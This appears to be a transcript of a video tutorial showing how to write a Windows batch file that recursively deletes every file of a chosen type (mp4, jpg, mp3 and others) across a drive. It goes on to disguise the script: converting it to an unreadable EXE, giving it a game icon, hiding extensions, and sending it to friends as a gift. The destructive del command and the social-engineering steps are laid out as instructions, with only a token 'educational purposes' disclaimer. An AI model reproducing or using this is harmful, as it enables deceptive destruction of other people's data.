Hello guys, welcome to my channel. If it's your first time to watching my video, please press subscribe button and support me. In this video, I'm gonna show you how to make a powerful virus. It's better to say a powerful BAT file that can delete. It can delete a specific file that you want, everything file you want. For example, I want to delete MP4 files, just MP4, not other files. For example, I want to delete AVI files or JPG or PSD or PNG, everything file that you want. Just set the extension of them. How can we set the extension of files? And I will tell you. And at the end, I will convert to and I will change to BAT file to exe, and will set a icon in this. And for example, I send it to my friend and I want to delete his MP4 files, and when he click on the virus, and all MP4 files will be deleted. It's very powerful. We can just using Notepad, doesn't matter. Okay guys, I want to open Notepad, and in Notepad I want to write three line codes. It's very how should I say it to you? It's very easy. It's very easy to learn. It's very easy to write this code. Just three lines. It's very few. At the first, at first you should you must write echo, because I want to make it bigger than for you, and because the header of all BAT files is all BAT files are at echo off. It's the starting of the BAT files. Okay, you must write it. You have to write at echo off. After that, writes del delete /q/a/s/f. After that, write the name of your drive. For example, my drive is the name of my drive is AF, and I want to set it AF, just capital AF. After that, colon /. Okay, / then an star. After that, a date. It's finished. After that, you must write the extension of file. What is the extension of file? For example, I have for example, how can I say? I have a txt file. Now, by default, it's like this. I don't know what is a txt file. It's a beautiful BAT file. How can we know is it a txt file? Come in here. If you use Windows 10, Windows 8, in here we have a tab by the name of view. You can file name extension, you can set it. And if you use Windows 7, in here we have a tab by the name of tools, and you can you can show the extension of file in here, and it is the extension of file. What is the extension of file? This is the extension of file. The extension of this file is txt, and I want to change it to cmd. Okay, I'm going to change it to cmd. It is a cmd file. Okay, and I want to delete this file, and I have a cmd file in here. I know, and doesn't matter. Okay, doesn't matter. And in here I want to write the extension of file. Which file? Okay, cmd. And I want to delete all cmd files. Everywhere this virus find the cmd file and delete it. And if you put it on the 10 folders, it finds. Okay, it will finds the file and delete for you. And at the end, just write pause. Pause. Okay, pause. Enough. It's my very powerful virus. Very powerful virus. At the end, you must save it as as BAT. Okay, Control+S. Yeah, you can save, or common files, and just click on save. And I want to save it on my desktop by the name of by the name of, for example, virus.bat. You have to save it as BAT because it's a batch file. It's a file of CMD. Just save it. Okay guys, and in here I have a CMD file in here, and I want to make a CMD file in here. Okay, I want to make a CMD file in here. It's the extension of, okay, cmd file in here, and I want to make a cmd file in the lesson. In here I want to make a cmd file. See guys, I made 3 cmd files in different places, and I want to make a cmd file on the photos. Just see on the photos, and I want to make this file cmd. See guys, how can it delete that file? I saved that file in here, virus.bat. I clicked it, delete file, new list, deleted file in cmd, deleted file. We had guys 4 files in different places, and I want to go to the places. We had a cmd files in here and it deleted. We had a cmd file in here and it's deleted. We had a cmd file in here and it's deleted. In here it's deleted. See guys, it's very powerful virus. It can delete it could delete all cmd files. And where is the benefit? Its benefit is you can set different extension. For example, I want to delete, okay guys, I want to delete mp4 files, okay, avi files, png files, jpg files, and at the end I want to delete mp3 files. If you run this virus in your computer or your friend's computer or anyone you want, it can delete all mp4 files, avi files, png files, jpg files, and mp3 files. Delete all of them from everywhere it can be. It's very powerful. Okay guys, it was very powerful, and it's very dangerous. And dangerous is for your friends, and you on those guys that you run it in your computer. See guys, and you can set for example which kind of files. lnk, it's a kind of virus, and I want to delete it, and I want to make lnk files. And where, and for example I want to in here I want to make a lnk files. Can it delete that file? In your idea, lnk, and I have a file in lessons in auto collection in here, and I want to delete this file. I'm click this deleted file. I want to go to here, and there is no file by the extension of lnk. Okay guys, I want to change it, and I want to make it more beautiful. For example, you can set color. For example, color for D, its color is how should I say? Its color is green. This color is green, okay. And color for T is green color, and you can show in here, for example, some sentences. For example, I want to show scan is running, okay. Scan is running. I set it in here, and in here I can also show examples or show sentences. And for example, echo in this here, echo scan is finished. Or you can set different sentences. For example, I made it, and for example I want to show here, and this is very powerful virus. You can change this sentence everything you want, and it's free, and just set it. For example, and here I want to set color 20, okay. Color 20 is this color is this color is red, and this color is green. In here, see guys, I want to save it, and I want to make a file by the extension of, for example, which extension, every extension you want, you can set. For example, I want to set init. This extension is also like virus extension, and I want to delete it. See guys, in here, and see. Okay guys, I changed this extension to init. I save it. I want to run it. It is the color 4D, it's red, deleted files. This is a very powerful virus, and in here we have color 20, it's red, green color, and then press any key. And you can, for example, you can write another sentence in here. For example, you show echo this virus, for example, this virus is made by, for example, my name, by name. Okay guys, by name, and you can set your name, and different sentences you can show in here, and different extension you can delete. It's very nice, it's very beautiful, it's very powerful virus. How can we change this file to exe file? Okay guys, no one wants to click on BAT file, because the most of people know the BAT file is very dangerous. They don't click on that. We have a software by the name of converter.bat. Okay, converter.bat. And okay, for example, if you want to download that software that it changed the BAT file to .exe, you must write in your browser convert BAT to exe. Just I have this software here, download that BAT to exe converter.zip, and I want to install it. And guys, have I this and this is and I didn't install. I want to install that, and I will show you how to install that software by the name of convert. See guys, by the name of convert to exe converter. It's a software that can change BAT file to exe files. And just open it, and in here it's the graphical. It's graphical, and you have to drag your file. Okay, drag your file, and or open, and click on open, and we have a file in here, pairs.bat, and it's very easy. Drag it and here put it, and it's my code. And when I can set password, I can set icon, and when I click on run, or no, on run, don't run, on convert, see guys, it will convert it to exe files. For example, in here I want to save it, file. I want to have a name, and the name should be virus in here. Please wait just a minute, and it will be make it. See guys, in here we have virus exe. What is different between exe files and BAT files? The most of people, when they see it's a BAT file, they right click and edit with Notepad+. See guys, and the virus.bat, it's not important guys. Here they can delete this. In here they can delete. It's not important. See guys, oh my god, it's a virus. Okay, it's a virus. I should not delete it. I should not click it. And if they come on click on exe files, edit with Notepad+, we want to see what is it, and when you click, it's not readable. Okay, it's not readable, and they can click in it. Very easy. I want to set password. Okay guys, I want to set password on BAT file. How can we set password? When you drag your BAT file in here, you can set an icon, and I can see an icon and password. And I don't want to set password. I want to set an icon for it. Which photos you can set on this on the BAT file? The extension of this file should be ICO. Let me show you. Here I have some convert.bat. Okay, some icon in here. The extension, all of them are ICO, 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 ICO. Okay, it's very necessary. Without it, you cannot set an icon. Click on icon and here, and where icon? My icon is in here, in F drive, in programs. We have setup in here, and I want to convert that zip. For example, I want to set it in game icon. Okay, game icon. I set it, and I want to convert. And in here, virus. Please wait just a minute. Just a minute, guys, and it will delete it. It's just you can hide the extensions. I want to hide the extension of the files in here, and it is a game. Just change the name. Set game. Okay, guys. I want to set a name for this file. For example, game. It is a game. Your friends or your friends, when you send this file, you say, hey my friends, I bought a game for you. When they click it, for example, you set delete all mp4 files. When you click on this file, his all mp4 files will be deleted. It's very powerful. Okay, guys, it was a very useful virus. And this video is just for educational purposes. Okay, and I wish that you should not use it in a bad way, and I'm sure you will not use this thickness in a bad way. Okay, guys, and it depends on your personality. Okay, guys, thanks for watching my video, and please share, follow, and like and subscribe my video to support me. I can upload for you very useful and very amazing techniques and videos. Thanks for watching my video again, and see you guys up to next video.